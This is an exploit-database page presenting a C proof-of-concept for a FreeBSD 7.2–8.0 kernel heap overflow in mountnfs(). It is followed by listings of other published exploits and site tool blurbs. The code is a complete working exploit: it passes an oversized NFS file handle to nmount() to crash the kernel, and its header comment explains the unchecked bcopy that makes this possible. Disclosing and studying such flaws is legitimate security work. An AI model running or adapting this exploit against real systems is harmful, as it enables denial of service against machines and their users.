Menu

Search for hundreds of thousands of exploits

"FreeBSD - 'mountnfs()' Denial of Service"

Author

Exploit author

"Patroklos Argyroudis"

Platform

Exploit platform

freebsd

Release date

Exploit published date

2010-06-23

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
/*
 * mountnfsex.c -- Patroklos Argyroudis, argp at domain census-labs.com
 *
 * Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2.
 *
 * Discovered and exploited by Patroklos (argp) Argyroudis.
 *
 * The vulnerability is in mountnfs() which is reachable by the mount(2)
 * and nmount(2) system calls.  In order for them to be enabled for
 * unprivileged users the sysctl(8) variable vfs.usermount must be set to
 * a non-zero value.
 *
 * mountnfs() employs an insufficient input validation method for copying
 * data passed in the struct nfs_args from userspace to kernel.
 * Specifically, the file handle to be mounted (nfs_args.fh) and its size
 * (nfs_args.fhsize) are completely user-controllable.  In file
 * sys/nfsclient/nfs_vfsops.c from 8.0-RELEASE:
 *
 * 1219     bcopy((caddr_t)argp->fh, (caddr_t)nmp->nm_fh, argp->fhsize);
 *
 * The above can cause a kernel heap overflow when argp->fh is bigger than
 * 128 bytes (the size of nmp->nm_fh) since nmp is an allocated item on
 * the UMA zone nfsmount_zone (again from sys/nfsclient/nfs_vfsops.c):
 *
 * 1164     struct nfsmount *nmp;
 *          ...
 * 1175         nmp = uma_zalloc(nfsmount_zone, M_WAITOK);
 *
 * The result is a kernel crash/denial-of-service.  I have developed a code
 * execution/privilege escalation exploit, but I will not release it at this
 * point.  7.1-RELEASE and earlier do not seem to be vulnerable since the
 * bug was introduced in 7.2-RELEASE.
 *
 * $Id: mountnfsex.c,v c1302ea1317d 2010/05/23 17:30:17 argp $
 */

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>

#define BUFSIZE     1024

#define FSNAME      "nfs"
#define DIRPATH     "/tmp/nfs"

int
main()
{
    struct iovec iov[8];

    mkdir(DIRPATH, 0700);

    iov[0].iov_base = "fstype";
    iov[0].iov_len = strlen(iov[0].iov_base) + 1;
    
    iov[1].iov_base = FSNAME;
    iov[1].iov_len = strlen(iov[1].iov_base) + 1;
    
    iov[2].iov_base = "fspath";
    iov[2].iov_len = strlen(iov[2].iov_base) + 1;
    
    iov[3].iov_base = DIRPATH;
    iov[3].iov_len = strlen(iov[3].iov_base) + 1;

    iov[4].iov_base = "fh";
    iov[4].iov_len = strlen(iov[4].iov_base) + 1;

    iov[5].iov_base = calloc(BUFSIZE, sizeof(char));

    if(iov[5].iov_base == NULL)
    {
        perror("calloc");
        rmdir(DIRPATH);
        exit(EXIT_FAILURE);
    }

    memset(iov[5].iov_base, 0x41, (BUFSIZE - 1));
    iov[5].iov_len = BUFSIZE;

    iov[6].iov_base = "hostname";
    iov[6].iov_len = strlen(iov[6].iov_base) + 1;

    iov[7].iov_base = "census-labs.com";
    iov[7].iov_len = strlen(iov[7].iov_base) + 1;

    printf("[*] calling nmount()\n");

    if(nmount(iov, 8, 0) < 0)
    {
        fprintf(stderr, "[!] nmount error: %d\n", errno);
        perror("nmount");
        rmdir(DIRPATH);
        free(iov[5].iov_base);
        exit(1);
    }

    printf("[*] unmounting and deleting %s\n", DIRPATH);

    unmount(DIRPATH, 0);
    rmdir(DIRPATH);
    free(iov[5].iov_base);

    return 0;
}

/* EOF */
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-06 "pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting" webapps freebsd "Matthew Aberegg"
2020-02-11 "OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution" remote freebsd "Marco Ivaldi"
2019-12-30 "FreeBSD-SA-19:15.mqueuefs - Privilege Escalation" local freebsd "Karsten König"
2019-12-30 "FreeBSD-SA-19:02.fd - Privilege Escalation" local freebsd "Karsten König"
2019-07-10 "FreeBSD 12.0 - 'fd' Local Privilege Escalation" local freebsd gr4yf0x
2016-01-25 "FreeBSD SCTP ICMPv6 - Error Processing" dos freebsd ptsecurity
2015-01-29 "FreeBSD - Multiple Vulnerabilities" dos freebsd "Core Security"
2013-10-04 "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation" local freebsd CurcolHekerLink
2013-06-26 "FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)" local freebsd Metasploit
2013-06-21 "FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation" local freebsd Hunger
Release Date Title Type Platform Author
2011-10-03 "Netvolution 2.5.8 - 'referer' Header SQL Injection" webapps php "Patroklos Argyroudis"
2010-06-23 "FreeBSD - 'mountnfs()' Denial of Service" dos freebsd "Patroklos Argyroudis"
2010-06-23 "FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation" local freebsd "Patroklos Argyroudis"
2010-02-07 "Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service" dos solaris "Patroklos Argyroudis"
2009-12-16 "Monkey HTTP Daemon < 0.9.3 - Denial of Service" dos linux "Patroklos Argyroudis"
2009-12-03 "OrzHTTPd - Format String" remote linux "Patroklos Argyroudis"
2009-12-02 "CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow" dos linux "Patroklos Argyroudis"
2009-07-09 "FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation" local freebsd "Patroklos Argyroudis" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected